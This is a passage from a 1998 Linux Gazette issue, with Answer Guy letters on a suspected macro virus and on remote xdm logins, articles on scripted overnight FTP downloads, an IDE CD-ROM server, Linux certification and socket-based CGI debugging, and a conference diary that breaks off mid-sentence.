
From [email protected] on 14 Oct 1998

Hello, Answerguy,

I found you on the web. Your name simply dictates that I must ask you a question:

A user has a Dell Laptop running Windows 95, Office97, and Outlook 98. Apparently, he has acquired some sort of virus (I'm assuming here) because when he opens Outlook 98 (Exchange 5.5) and sends and email (replies or writes a new message) three windows automatically open and the cursor continuously types a character until he hits the spacebar. This happens when he opens a Word document and an Excel document, too.

(!)You only know part of the story. My full "name" is "The Linux Gazette Answer Guy" (tag).
So, I answer LINUX questions.
However....

(?)Background:

I've run McAfee 3.2 (with latest DAT files) and found no trace of viruses (clean boot, et al.). This laptop was sent back to Dell and they (supposedly) Fdisked it and reinstalled the OS. Worked for a while, but IT'S BAAAACK. Definitely sounds like some sort of file infection, but I'm at my witt's end. I've scanned all files on the network and found one Macro-infected virus (cleaned).

Any information or insight that you can provide would be welcome.

Thanks for your time, AG.

Gary Hollifield
MIS Manager
FOCUS Enhancements, Inc.

NOTE: Please reply to all (I would like to get this at work, too). Thanks again.

(!)As it happens I used to work for McAfee (as a Unix sysadmin, and their BBS SysOp). I also did some QA on SCAN.
While the behaviour you describe is suspicious, we can't definitely say that it is a virus solely from the symptoms you describe.
I would wipe the system personally (don't send it off to the chop shop, do it yourself). Leave it completely off of the network for a few days (at least twice as long as it seemed to take for the problem to appear on the prevous occasions).
Install all software, OS, Office, etc from the orginal CD's. Manually disable the "boot from floppy" options in the CMOS setup and the "autoexecute macro" features from WinWord and Excel. Manually inspect all documents that go onto the system (and limit yourself to short documents).
It could be some strange compatibility problem. If you don't see this happening on any other systems in your network, and with which this system as been sharing files, floppies and users, than it's not a virus (it's not spreading!).
Other than that, I'd consider putting Linux on it, and running that. Although there as been one "virus" for Linux (Bliss, a piece of sample code that actually managed to honestly infect a couple of users), they are simply not a problem for Linux, FreeBSD, or other Unix users.

(?)Remote X using xdm

From Andy Faulkner on 28 Sep 1998

Dear answerguy.

I have been trying for the last several hours that when I first started it sounded simple.

I am trying to launch a xdm session on my linux box from a another linux box on the same network.

I have tried to use "chooser" but it brings up no listed hosts. Also when I fire up chooser I see nothing going across the network. I hate to say this but with my Winblows box I can do it with reflectionX. I am running S.u.S.E. 5.2 and the other machine is running 5.3. We are both using KDE and also using kdm instead of xdm. We have tried both, and both had the same results. It looks as though I am not sending the request out to the host for a xdm session.

I can't seem to find any docs on "chooser" or on how to launch a session on a linux box.

What do you think? Andy Faulkner

(!)I think 'chooser' (/usr/X11R6/lib/X11/xdm/chooser) is normally run by 'xdm' --- probably with some special environment variables and parameters. --- I don't think it's feasible to run 'chooser' by itself. (That would be a good reason to put it in the "lib" directory rather than under a bin directory --- and would explain why it has no man page of its own.
(I'll grant that this seems like an odd way to do it --- since making 'chooser' a shared library would make more sense from a classical programming point of view. In any event I don't know how you'd use 'chooser' directly).
Remote execution of X sessions via xdm is a bit confusing. Under S.u.S.E. they have a script /sbin/init.d/rx which can be used with their /etc/rc.config variable settings to run the xdm and allow access via XDMCP (the X display manager control protocol).
To remotely access systems running these display managers you have to run your X server with a command such as:
X -broadcast
(connect to the "first" --- or only --- available xdm server).
Alternatively you can specify the server you want to connect to with a command like:
X -query $HOST
--- which will require the host name or IP address.
To use the chooser you have to run a command like:
X -indirect $HOST
... this will cause the xdm on the named host to provide a list of known xdm hosts (possibly including itself).
In any of these cases the 'xdm' process must already be running on the remote host. That host need not be running any X server! (I realize the terminology is confusing --- more on that later).
To quote the xdm man page:
When xdm receives an Indirect query via XDMCP, it can run a chooser process to perform an XDMCP BroadcastQuery (or an XDMCP Query to specified hosts) on behalf of the display and offer a menu of possible hosts that offer XDMCP display management. This feature is useful with X terminals that do not offer a host menu themselves.
(it's also possible to configure the list manually and to configure it so that some BroadcastQuery replies are ignored).
I have no 'kdm' incorporates all of these functions are not. You should look through their man page for details.
I'm also a bit unclear on how you'd run xdm such that it would not run a local display server. I know it's possible, but I'm not sure how. (In other words, if you want to run 'kdm' on your console and 'xdm' for the remote X servers).
I realize the terminology is a bit confusing here. We have "xdm servers" running on one machine, and X servers (the X Windows display server --- the think that actually controls your video card) running on other machines. Note that the X display server controls your video card and acts as a communications package between your display (keyboard, video, and mouse) and the programs that are running under X (the "clients" to your display server).
Thus 'xdm' is a "client" to your X display server regardless of whether that 'xdm' process is running on you localhost or on another machine on the network.
To complicate issues even further the 'xdm' "indirect" option first connects your X server to a one client --- then, based on the selection you make from the chooser, it restarts your X server with instructions on connecting to another 'xdm' host.
In the end, when you connect to a host via 'xdm', you log into and it is as though you were running an X session at that system's console. All of the windows you open will be processes running on the 'xdm' host. So you can think of 'xdm' as a combined 'getty' and 'telnetd' and 'login' for the X protocol.
There are a variety of shell scripts under /usr/X11R6/lib/X11/xdm that control how the console is "taken" (back from a user that logs out) "given" (to a user that logs in), "setup" (prior to xdm's display of the "xlogin" widget), "started" (as 'root' but after login) and how the "session" is started (under the user's UID).
You'll want to read the xdm man page and all of the scripts and resource files in the xdm directory to adjust these things. (It just amazes me how complicated all that vaunted "flexibility" and all those customization options can make something as seemingly simple as: provide me with a GUI login).
Anyway, I hope that helps.

"Linux Gazette...making Linux just a little more fun!"


Building an Automatic FTP Retriever

by


Internet is the big and wide world of infomation, which is really great, but when one works on a limited Internet access, retrieving big amounts of data may become a nigthmare. This is my particular case. I work at the National Astronomic Observatory, Universidad Nacional de Colombia. Its ethernet LAN is attached to a main ATM university's network backbone. However, the external connection to the world goes through a 64K bandwidth channel and that's a real problem when more than 500 users surf the net on day time, for Internet velocity becomes offendly slow. Matter change when night comes up and there is nobody at the campus, and so the transmition rate grows to acceptable levels. Then, one can downloading easily big quantities of information (for example, a whole Linux distribution). But as we are mortal human beings, it's not very advisable to keep awake all nights working at the computer. Then a solution arises: Program the computer so it works when we sleep. Now the question is: How to program a Linux box to do that? This is the reason I wrote this article.

On this writting I cover the concerning about ftp connections. I have not worked yet on http connections, if you did so, please tell me.

At first sight, a solution comes up intuitively: Use the at command to program an action at a given time. Let's remember how looks a simple ftp session (in bold are the commands entered by user):

bash$ ftp anyserver.anywhere.net
Connected to anyserver.anywhere.net.
220 anyserver FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) 
ready.
Name (anyserver:theuser): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:(an e-mail address)
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd pub
ftp> bin
ftp> get anyfile.tar.gz
150 Opening BINARY mode data connection for anyfile.tar.gz (3217 bytes).
226 Transfer complete.
3217 bytes received in 0.0402 secs (78 Kbytes/sec)
ftp> bye
221 Goodbye.
bash$ 

You can write a small shell script containing the steps that at will execute. To manage the internal ftp commands into a shell script you can use a shell syntax feature that permits to embed data that supposely would come from the standard input into a script. This is called a "here" document:

#! /bin/sh
echo This will use a "here" document to embed ftp commands in this script
# Begin of "here" document
ftp <<**
open anyserver.anywhere.net
anonymous
[email protected]
cd pub
bin
get anyfile.tar.gz
bye
**
# End of "here" document
echo ftp transfer ended.

Note that all the data between the ** strings are sended to the ftp program as if it has been written by the user. So this script would open a ftp connection to anyserver.anynet.net, loging as anonymous with [email protected] as password, will retrieve the anyfile.tar.gz file located at the pub directory using binary transfer mode. Theoretically this script looks okay, but on practice it won't work. Why? Because the ftp program does not accept the username and password via a "here" document; so in this case ftp will react with an "Invalid comand" to anonymous and [email protected] . Obviously the ftp server will reject when no login and password data are sended.

The tip to this lies in a hidden file that ftp uses called ~/.netrc ; this must be located on the home directory. This file contains the information required by ftp to login into a system, organized in tree text lines:

machine  anyserver.anynet.net
login    anonymous
password [email protected]

In the case for private ftp connections, the password field must have the concerning account password, instead an email as for anonymous ftp. This may open a security hole, for this reason ftp will require that the ~/.netrc file lacks of read, write, and execute permission to everybody, except the user. This is done easily using the chmod command:

chmod go-rwx .netrc

Now, our shell script will look so:

#! /bin/sh
echo This will use a "here" document to embed ftp commands in this script
# Begin of "here" document
ftp <<**
open anyserver.anywhere.net
cd pub
bin
get anyfile.tar.gz
bye
**
# End of "here" document
echo ftp transfer ended.

ftp will extract the login and passwd information fron ~/.netrc and will realize the connection. Say we called this script getdata (and made it executable with chmod ugo+x getdata), we can program its execution at a given time so:

bash$ at 1:00 am
getdata
(control-D)
Job 70 will be executed using /bin/sh
bash$

When you return at the morning, the requested data will be on your computer!

Another useful way to use this script is:

bash$ nohup getdata &
[2] 131
bash$ nohup: appending output to 'nohup.out'
bash$ 

nohup permits that the process it executes (in this case getdata) keeps runnig in spite of the user logouts. So you can work in anything else while in the background a set of files are retrieved, or make logout without kill the ftp children process.

In short you may follow these steps:

And voilá.

Additionally you can add more features to the script, so it automatically manages the updating of the ~/.netrc file and generates a log information file showing the time used:

#!/bin/sh

# Makes a backup of the old ~/.netrc file
cp $HOME/.netrc $HOME/netrc.bak

# Configures a new ~/.netrc
rm $HOME/.netrc
echo machine anyserver.anywhere.net > $HOME/.netrc
echo login anonymous >> $HOME/.netrc
echo password [email protected] >> $HOME/.netrc
chmod go-rwx $HOME/.netrc
echo scriptname log file > scriptname.log
echo Begin conection at: >> scriptname.log
date >> scriptname.log
ftp -i<<**
open anyserver.anywhere.net
bin
cd pub
get afile.tar.gz
get bfile.tar.gz

bye
**
echo End conection at: >> scriptname.log
date >> scriptname.log
# End of scriptname script

To create by hand such script each time we need to download data may be annoying. For this reason I have wrote a small tcl/tk8.0 application to generate a script under our needs.

You can find detailed information about the ftp command set in its respective man page.



Copyright © 1998, Manuel Arturo Izquierdo
Published in Issue 34 of Linux Gazette, November 1998


[ TABLE OF CONTENTS ] [ FRONT PAGE ]  Back  Next


"Linux Gazette...making Linux just a little more fun!"


Building an IDE CD-ROM Server

by Ron Jachim and Howard Cokl

of the Barbara Ann Karmanos Cancer Institute


Introduction

The advantages of having a CD-ROM jukebox should be readily apparent in a networked environment. You can provide multiple CD-ROMs to multiple people. Granted, in an ideal environment, you would want the throughput of SCSI CD-ROM drives. There are also disadvantages to SCSI drives. They are more expensive and harder to configure. A cheaper alternative is to use a bunch of IDE CD-ROM drives. Many people even have slower ones lying around because they just had to have a faster one.

What you need:

I assume that you can assemble all of the parts necessary. You may have to call around and ask about an appropriate case -- order it with a power supply as they sometimes use unusual ones. JDR does not show one in their catalog, but we got ours from JDR. The most unusual component is the IDE controller which we have describe below, and it is not even that unusual.

IDE Controller Description

The only key to this server is that you can have up to four IDE channels, each capable of supporting two drives. The controller must be ATAPI compliant to support IDE CD-ROM drive. Assuming you use a single IDE hard disk for booting, that leaves up to seven connection points for additional IDE devices, in this case CD-ROM drives. An appropriate controller is the Enhanced IDE controller card, part number MCT-ILBA from JDR Microdevices (www.jdr.com) which lists at $69.99.

Many motherboards are capable of supporting one or two IDE channels, so configuration instructions vary slightly. The rest of the discussion assumes you want a maximal configuration.

 

No Channels on the Motherboard (two IDE controller cards required)

Configure the first controller so that its first channel is the primary controller and the second channel is the secondary controller. The controller card should have a BIOS address and you will need to make sure it does not conflict with any other BIOS address ranges already in use (or on the other IDE controller card).

Configure the second controller so that its first channel is the tertiary (third) controller and the second channel is the quaternary (fourth) controller.

Note your IRQ and I/O Address range for all channels. Remember, you cannot share the IRQs, I/O address ranges, or BIOS address ranges.

1 Channel on Motherboard (two IDE controller cards required)

If the motherboard has one IDE channel, it will support two IDE drives. Configure the channel as primary. You probably have no choice in this, but if you do, choose primary.

Configure the first IDE controller card so that its first channel is the secondary controller and disable the second channel. The controller card should have a BIOS address and you will need to make sure it does not conflict with any other BIOS address ranges already in use (or on the other IDE controller card).

Configure the second IDE controller card so that its first channel is the tertiary controller and the second channel is the quaternary controller.

Note your IRQ and I/O Address range for all channels. Remember, you cannot share the IRQs, I/O address ranges, or BIOS address ranges.

2 Channels on Motherboard (one IDE controller card required)

If the motherboard has two IDE channels, it will support four IDE drives. Configure the first channel as the primary controller and the second channel as the secondary controller.

Configure the IDE controller card so that its first channel is the tertiary controller and the second channel is the quaternary controller. The controller card should have a BIOS address and you'll need to make sure it does not conflict with any other BIOS address ranges already in use (or on the other IDE controller card).

Note your IRQ and I/O Address range for all channels. Remember, you cannot share the IRQs, I/O address ranges, or BIOS address ranges.

Table of Common IDE Information

#

Channel

IRQ

I/O Address*

 

0

Primary

14

1F0-1F8

 

1

Secondary

15

170-178

 

2

Tertiary

11

1E8-1EF

 

3

Quaternary

10

168-16F

 

 

* Note: the documentation with our card was incorrect.

Software Installation

Once you have configured the hardware and noted all settings, you are nearly done.

Start the Slackware installation with the bootdisk. A normal Linux installation has two IDE channels configured, so you only need to configure in the other two channels. At the "boot:" prompt specify the additional IDE channels using kernel "command line" options. For example,

boot: ide2=0x1e8,0x1ef,11 ide3=0x168,0x16f,10

As you can see, the third IDE channel (ide2) uses I/O addresses in the range 1E8-1EF and IRQ 11. The fourth IDE channel (ide3) uses I/O addresses in the range 168-16F and IRQ 10.

After completion of the Slackware install it is simply a matter of either exporting the drives for NFS mounting or configuring Samba and sharing the drives.

Next Step

The next thing we would like to do is configure the CD-ROM server with 8 CD-ROM drives and no hard disk. We feel it is a technically elegant solution to have the boot disk be a custom-burned CD-ROM and use BOOTP or DHCP to handle the network configuration. A possible alternative is to use a solid state drive for boot purposes.


Copyright © 1998, Ron Jachim and Howard Cokl
Published in Issue 34 of Linux Gazette, November 1998


[ TABLE OF CONTENTS ] [ FRONT PAGE ]  Back  Next


"Linux Gazette...making Linux just a little more fun!"


Creating a Linux Certification Program - The Next Step

By


Creating A Linux Certification Program - The Next Step

After my article in the October Linux Gazette, I received over 60 replies, almost all of which were positive. With this next article, I want to announce some various resources on the web and also a new mailing list to discuss certification. Many thanks to all of you who have sent me pointers and also volunteered to help. I received responses from all corners of the globe and was excited and impressed to see: a) the work some people are already doing on Linux training and certification; b) the enthusiasm out there about Linux, and also about Linux training and certification; and c) the willingness of so many people to help out and be involved!  THANK YOU!!

Initial Comments

Five specific notes before I get to all the pointers people have sent me:

Resources Relating To Linux Certification

As a result of my article, a number of people sent me pointers to resources available on the web relating to Linux training and certification.  The pointers are listed below.

Final Thoughts

Other people did point out that this topic has been around for a while. Indeed, through the AltaVista search engine I found pointers to discussions that occurred about setting up a Linux certification program back in 1996.

The issue now is that the momentum of certification within the IT industry just keeps increasing and the responses to my article make me only that much more sure that we need to move now to make sure that we build a unified Linux certification program that we all can get behind and promote with the same energy and enthusiasm that Microsoft promotes the MCSE and Novell promotes the CNE. 

The biggest single item that can kill a Linux certification program is if we in the Linux community wind up with 4 or 5 different separate programs! (Do I hear the UNIX wars again?)  There is strength in numbers - can we build a common program?   Please join me on the mailing list and let's see if we can give it a shot! Previous Article


Copyright © 1998, Dan York
Published in Issue 34 of Linux Gazette, November 1998


[ TABLE OF CONTENTS ] [ FRONT PAGE ]  Back  Next


"Linux Gazette...making Linux just a little more fun!"


Debugging CGI Programs over TCP Sockets

by


BACKGROUND

This article evolved from my frustration in developing and debugging CGI programs written for the AuctionBot, a multi-purpose auction server. I found that the available C libraries, C++ class libraries and web server extensions did not fit my needs so I decided to implement a different approach based on debugging over TCP sockets. Using this approach, I have successfully implemented and debugged most of the CGI's for this project.

My development machine at work is a Sun Ultra 1 running Solaris 2.5. At home I have a Linux box running RedHat 5.0. I developed all my debugging code under Linux. Linux provides a very stable development environment that allowed me to develop, test and experiment locally, without requiring remote login to the Sun. Once the code was running, I simply moved it over to the Sun, built it and started using it.

OVERVIEW

Debugging CGI (Common Gateway Interface) programs present unique challenges not found when debugging programs in more traditional environments. CGI's are executed by a web server and run within the environment created by the web server. This makes a CGI's runtime behavior strongly coupled to the environment setup by the web server. A developer can not simply run a CGI from a shell, or under a debugger, and expect it to behave as it does while running within the web server environment.

A common CGI debugging technique involves capturing the environment that a CGI is run under (usually to a disk file), restoring the environment on a local machine and running the CGI locally within the restored environment. Using this technique, CGI's can be run from the command-line, or from within a debugger (gdb for example) and debugged using familiar debugging techniques. This technique is straight forward, but requires the developer to perform the extra work of capturing and restoring the CGI runtime environment.

Another problem in debugging CGI's is viewing the output of a CGI that fails to run correctly. If you are using Apache 1.2 or later, this can be addressed by configuring the web server to log error messages to a error log file. This approach works for some classes of problems, but does not provide the granularity I wanted.

One could write debugging/status information to log files and use tail -f logfile to view the file. This works, but can produce deadlock conditions if multiple copies of your CGI are running and they attempt to use the same shared resource (the log file) and do not use file locking. Developers must provide file locking code and handle possible deadlock conditions, including cases where a CGI crashes before it releases its file lock [1]. In addition, all writes must be atomic to ensure correct output.

Ideally, one would like to debug the CGI in its natural surroundings, i.e. from within environment created by the web server, without any extra setup work.

MY SOCKET-BASED SOLUTION

An alternative technique is to use network sockets to write debugging information using printf-like statements to a debug server application running on the developers local machine, or any machine on the network. Using this technique, CGI's can be debugged and monitored quickly and easily while running within the server environment. The class SocketDB provides the required behavior to debug CGI's over TCP sockets. The class supplies methods to connect to the server and write strings over a TCP socket.
class SocketDB
{
private:
  int mSD;
  ErrorTypes mErrorType;
  int mConnected;
  
public:
  SocketDB();
  SocketDB(char *name, int port);
  ~SocketDB();

  int Connected() { return mConnected; }      
  int ErorType() { return mErrorType; }      
  int Connect(char *name, int port);
  
  int Print(char *format,...);
  int Println(char *format,...);
};
To connect to the server use the SocketDB constructor passing the server name and port, or use the Connect method. Both will attempt to connect to the server on the specified port. Use the Connected method to determine if the connection was successful or you can use the return value of Connect. The Connect method returns 1 if connected, otherwise, 0. If a connect error occurs, use the ErorType method to get error information. The file Socket.C enumerates the error types.

THE CLIENT

The program DebugClient (see DebugClient.C) shows how to use the class. For simplicity, I designed this program to run from the command-line, rather than a CGI program run by the web server. I choose this approach so users could quickly run the program and see how the socket debug class works. Integrating the class into a CGI is very straight forward.

The program attempts to connect to the debug server program specified by the command-line arguments host and port (see source code). If it fails to connect, it prints a message, and the error code and exits. If it connects, it prints the test string, writes the same string over a TCP socket to debug server and reports the result of the debug server write.

A DEBUG SERVER

The program DebugServer (see DebugServer.C) implements an example debug server [2]. This program is a simple echo server that creates a socket, binds to it and accepts connections from clients. Once it gets a connection it forks off and handles the connection. In this case it just reads a string and echoes it.

USING THE PROGRAMS

To use the client program and the debug server, cd to the directory containing the example programs and type DebugServer [port] where port is the port you want the server to listen on. For example, to run the program on port 4000, type DebugServer 4000.

In another shell cd to the directory containing the example programs and type DebugClient [host] [port] where host is the host name of the machine the server is running on (get this by typing hostname at the command prompt) and the port is the port were the server to listening (4000 for example).

You should see a text string written to the server and to the shell.

CONCLUSIONS

Using network sockets to write debugging and state information to a server application is a flexible and effective technique for monitoring and debugging CGI programs. Using this method, developers can quickly debug CGI's while they run within the server environment.

RESOURCES

[1]. W. R. Steven, 1990, UNIX Network Programming. New Jersey: Prentice-Hall, Inc, pp. 88-101.
[2]. W. R. Steven, 1990, UNIX Network Programming, Network APIs: Sockets and XTI Volume 1. New Jersey: Prentice-Hall, Inc.

Code: http://groucho.eecs.umich.edu/~omalley/software/socket_debug-1.0.tar.gz


Copyright © 1998, Kevin O'Malley
Published in Issue 34 of Linux Gazette, November 1998


[ TABLE OF CONTENTS ] [ FRONT PAGE ]  Back  Next


"Linux Gazette...making Linux just a little more fun!"


 

Fall Internet World 98
A View From the Show Floor
By



 



I just experienced my first big league Internet show. And was it a doozer.... The show was titled 'Fall Internet Show 98' and it took place in New York City's Javits conference center. There was a 4 day 'vertical' track on TCP/IP which was one of the motivations for going to the show. The other was to meet the commercial Linux people in person. So what follows is a 'diary' of what I can remember of the show.

Day 1) I live on Long Island NY and I have to take a 1.2 hour train ride in order to reach the Javits convention center where the show is being held. My day starts by getting up at 5:45 am, taking a quick shower, and trying to get to the train station, a good 30 minutes from home, by 6:30am. This first day, I got a call from the experiment where I work, telling me that data cannot be collected. I'm the DAQ guy. I figured I would drive by work, fix the DAQ problem and continue on to the train station. The problem was minor, but I missed the 6:30 train I wanted to take and ended up on a later train. What was the rush? According to the Fall Internet World 1998 web page, the keynote speakers were to start on Monday at 9am and I still had to register. I wanted to get into Javits, register and get a good seat for the keynote. I was rushing to get to NYC. The train ride in was uneventful. The weather was fantastic. 70 odd degrees that day, clear blue fall skys. Getting into Pen Station and out onto the streets of NYC, on a bright clean crisp fall day is hard to explain. You have to experience it yourself. Javits is between 34th and 36 or 37th street and 11th Ave. Pen Station on about 8th and 33rd. So I take off west, down 34th searching for Javits. I've seen it from the outside a long time ago and I'm not really sure where to find it. Found it, hard to miss. And yes, there was some kind of computer show going on there. The front of the convention center had these large banners draped with some message from Hewlett Packard for all to see. There were some other banners draped in front of the building which I cannot recall now.

In I go expecting to see thousands and the place looks rather empty. I peer into the show floor to find boxes and crates unopened all over the place. "Gee", I think to myself, "They have a lot of work to do in order to get setup for today". I go over and registers, there is no one in line. And again I think to myself "This is weird, the place is dead". I was worried that I would miss the key note address of John Gage, some science guru working for Sun. Well, it turns out that the show is really to get going on Wednesday. Ha, this explains all, I'm rushing around for no purpose at all. The good thing was that the sessions I wanted to attend did start today so waking up at 5:45am was not a complete waste of my time. Now all I had to do was blow off 1 hour waiting for my session to start. In the mean time, I went to get a cup of coffee from one of the show vendors. I spent 5 bucks on an oversized coffee and muffin. The coffee these guys sold me was so charged up, that I ended up running to the bathroom to pee at every break in my session.
 



 


10am finally rolled around, I went to my session titled 'The Infrastructure of IP' or something like that and spent the rest of the day listening to a rather polished man, (polished in appearance,) telling me about IP. I knew about 70% of what he was telling me and was gland to learn of the other 30% of which I've heard of but never knew the details. (What exactly is a class A, B, C, D or E type network and the details of the why's and whereof's of DHCP, a rather new protocol to replace bootp, (new in that I've just heard of it when RedHat 5.1 was released)) The other stuff he covered I cant remember now. What I remember most of this session was that this guy reminded me of a tele-evangelist. First off, the guy wore a very nice suit. You can't blame him, its his job, and working in the private sector, you have to look good. He worked for a training company and this explained why, at least I assumed why, he presented his material as he did. His style was as follows. His presentation tool was power point, jazzed up with animations. The slide could not just pop up. The letters had to roll in, high light streaks had to streak in, the bullet items came in, rolling in one after another with a nice time delay between bullet items of several seconds. Very slick. He would present his material in a way which was supposed to make you feel good about what you were listening to. He kept asking questions, not for the sake of the question, but to get the audience involved. He would walk up and down the isle talking about IP headers, the OSI networking model and always interjecting, "Do you feel comfortable with that? Is it all coming together now?", all the while I'm getting this weird feeling that I need to yell "Amen, the TCP/IP God is great and forgiving".

This went on for the rest of the day. Sitting inside this small room listening to the wonders of IP. At one point, I decided I needed to get out and look around a bit to see what the rest of the conference attendees were engaged it. I poked my head into one room, about 4 times the size, full of people, talking Web marketing strategies. I mean it was full. This pointed out to me one fact about the internet. Very few know how it really works, and the rest are trying to cash in using browser technology.

Day 2) Since my session didn't start until 10am, I didn't rush to catch the train. Instead I took my wife to work, and then had to run and catch the last train which got into NY at 10am. Meaning I would miss the first 15 minutes of my session. That's OK. After sitting through about 6 hours of Tele-evangelism I figured I could miss the 1st 15 minutes of the "Integrating Unix and NT", or was it, "Making Unix talk to NT" or something to that effect. The idea being that you were to learn how to setup a heterogenous Unix/NT computing environment. I got the same guy from yesterday giving this session, great guy, but I couldn't take it anymore. He ended getting hung up on setting up a DHCP server on his laptop running NT. Hey, I can fill in a widget form thing with IP numbers too... I figured I had enough and that this time, I wouldn't learn much. I wanted to see what else was 'out there'. So I wondered over to the ISP session. There was an interesting talk on setting up VPN's. That was new to me. Virtual Private Network. I still don't understand why it's such a good thing. To me, it has a bit of a snake oil man's thing to it. Look, we can setup this 'tunnel' between sites on your enterprise. Its secure, it uses the internet, it drives costs down. And I'm thinking to myself, "Well, I've got secure shell on my PC at home, if I've got secure shell on my PC at work and I ssh between the two, I must have a VPN!". I'm pushing the forefront of internet technology without even know it. I guess VPN's are for those who don't have access to ssh. Hmmm... I paid $0 for ssh, I wonder what it costs to setup a VPN? Do the ISP's give it away? I wandered from the ISP session to the Telephony session. I learned about VPN's in that session too. Here, there was a slick woman from 3Com who had even slicker .ppt files to dazzle you with. These .ppt files were in full animation. Cartoons would pop up and disappear, text would flow, arrow and pointers swooshed. I hope I don't get a .ppt deficiency complex next time I present my all too static transparencies. (Transparencies.... (yes I do code in Fortran more often that I would like to admit. But I have written some c++ code, a crude as it was...))

Lunch came next. The day before I got a hotdog from a vendor across 11th avenue for $1.50. With soda it cost me less than $3.00. Today, I got into the cafeteria line, pulled a rather bland ham and cheese hero looking thing from a shelf, a bag of chips and a soda. $10.00!!!! I grunted as I pulled out a $10 bill from my wallet but the cashier didn't seem to care. (Its not her fault I'm stupid.) I wandered around the tables, found one where only one guy was sitting at a table which fit 4. I sat down and munched away. After some time, I got to talking to the guy. He was a chap from Israel with a T1 connection out of his house and a 45Mbit connection coming in! Talking about an asynchronous plug into the Internet. My god. This guy was into testing some on demand DVD video app into his house. We'll, I'll be waiting form my 45Mbit connection coming from Bell Atlantic soon. Yea, real soon. It took 9 months to get ISDN into my house after Bell Atlantic, when they swore up and down it would be 3 weeks tops. Using Adler's law of monopolistic trends in hi-tech, I give Bell Atlantic 20 years before I see 45Mbits into my house, even thought this guy has it *now*. (I'll have more sarcastic comments on this topic later...) Ok that was lunch. I decided to blow off the rest of the Unix/NT session. At this point I cant remember very well what I did. It's all getting rather blurry. I do remember the last session I went to on day 2 of the conference. It was titled "The governance of the Internet" and was a panel of a bunch of rich guys discussing how the government should not intervene with regulating what is deployed on the internet and how its deployed. The unfortunate part was that too much of the discussion centered on 'adult material' with eyes rolling up on each mention of that dirty subject.

Day 3) Finally, the first day of the real conference. I got up at 5:45 am, and rushed off to catch the train. The 7:05 express got me in about 8:30 which would be enough time to walk over to Javits and catch a good seat for the morning key note. The deliverance of this keynote really set the stage for the next two day's of this conference. The key note took place in the 'special events hall'. A large auditorium with a low sealing which could seat about 1000 people I estimated. The stage was setup with 4 projection size TV screens. (20 feet high by 30 feet long, I don't know if I have the aspect ratio correct there, but they were big) Above the speakers podium was another regular TV which must have been at least 48'' in size. The props which fit between these screens were black with fluorescent thin geometric design. (Predominantly orange fluorescent tones) As I walked in, some rather hyped rock and roll music was playing. Fast beat music. I'm glad I didn't have a cup of the coffee they served there in the Javits food stand because between the caffeine overdose they serve and the rock and roll, I would have shot out of my chair. So there I wait, rock and roll in the back ground, cool fluorescent stage props in front and tons of MecklerMedia adds on the TV screens, (All 5 monster screens of them). The music let up, the screens went blank and the show was about to begin. The first 2 or 3 minutes was dedicate to a rather glizy add of Sun Microsystems. More rock and roll, the 5 screens lit up with MTV style imagery dedicated to promoting Sun. After that, some rich guy, (member of the overclass), comes out and introduces himself. (Head of MecklerMedia, the sponsors of the show.) He eventually gets around to introducing the keynote speaker, John Gage. John, from what I can tell, has a science background. I would assume he has a Ph.D. in physics or something since he is the science liaison for Sun Microsystems. Being that I'm a scientist, I figured this would be a good chance to see what us science guys are doing to help internet technology. He gave a very good talk. In the end, he ended up promoting Sun's alternative to corba called jini. And no, its not in the public domain. John had some guy who seems to be involved in the development of jini come out and tell us what jini is and how it would affect the world. The appliance world that is. Jini was going to be, dare I call it the OS, which runs in your cam-corder, cell phone, PC, coffee pot, refrigerator, steering and breaking system in your car, landing gear in the next plane you fly, in the stop light at your closest busiest intersection, in the elevator in the World Trade center... Wait, is this a Really Stupid Idea!!!! This is nuts!!!! I don't want my car's breaking system to be on the Internet! No Way! It's going to be break-in city. All the hackers (I don't mean to give all hackers a bad name) who dedicate themselves to testing system IP vulnerabilities are going to have a field day. I am sure there will be a web page with the IPv8 address of my breaking system and the buffer overflow code which you can down load into this jini thing in my breaking system which will cause the breaking system to invert. Instead of pushing the peddle in my car to break, I'll have to push the break peddle to release the emergency breaks in my car. Good grief, I thought the year 2K freaks were crazy about the end of the world. Jini will end it all. After this jini guy finished talking about the object'ivity of this code, (you should have heard him rant. "This cam-corder is an object. Its got methods! The record method. The 'upload your data' method") all while he was staring intently at the cam-corder. It was if he was looking into and beyond the cam-corder into every appliance on the internet, including the breaking system of my car. John finished off his talk in a brilliant fashion. he pulled up the 'coolest taxi in Colorado' web page for us to see. Some guy, I can't remember where in Colorado, has wired up his cab to the internet. the interior of his cab is totally wacked out. Its got a full complement of musical instrument, drums, key board, amplifiers etc. as well as some digital camera which he used to take pictures which he uploads to his web site. Here check it out. Click here.

After that bit of excitement I decided to pace myself and go to some sessions before hitting the trade show floor. The problem is that I can't remember what sessions I went to. But I do know that I only went to one of them. Because it was after that I was soon on my way to checkout the RedHat booth. My main calling to this show was to meet the RedHat team. I wouldn't call my self a Linux fanatic, maybe just an enthusiast. And I've gone through about 50 installations of RedHat on one machine or another since I started using it in the spring of 1996. I've been following the growth of RedHat somewhat on a daily basis since then and I've seen that they tour the world, meeting LUG groups and what not. So, needless to say, I did have a peak of curiosity to meeting someone from RedHat in flesh and blood. My search for the RedHat booth was frustrated by the poor documentation provided by the show. I went to the first floor, looking for booth 3368 or something like that and found this empty booth space in the far back reaches of the first floor show area. I then found out that they were on the second floor. This was good since this was the main show area. Then I went to the second floor and wandered around looking for them. Again, the booth numbering is not quite random but close. I'm sure mathematicians have a name for its. Local Random Space, or local non-transforming functionals, who knows. I finally stumbled into them. There it was, the RedHat booth. I was expecting it to be mobbed by people, but it was not. It was rather empty. They had one or 2 PC's running RedHat Linux and the secure version of Apache. I went up and introduce myself to Melissa, the PR woman for RedHat, although she didn't want to refer to herself as a PR person. I guess there is some stigma attached to the PR departments of high tech companies which eludes me. Maybe is because I don't watch enough TV to see all the MS commercials. In any case, I told Melissa that I expected RedHat is going to get really big. I was curious to find out what was going on with the company. She told me that it was crazy right now. My guess is that the RedHat team is hacking late into the night. With the recent investment of Netscape, Intel and two venture capital firms, they are clearly booming. (I recently saw the announcement for two new positions at RedHat on their announcement mailing list.) As I stood round the booth, it was clear to me that people were continuously coming to the RedHat booth to ask questions. I was trying to stay out of their way. Or answer some questions for them if some people couldn't get to the RedHaters. After telling Melissa that I have a RedHat mirror site, she got excited and gave me a mouse pad and a poster. I hung around a bit more, found out that all the other Linux vendors were in the Oracle Partners 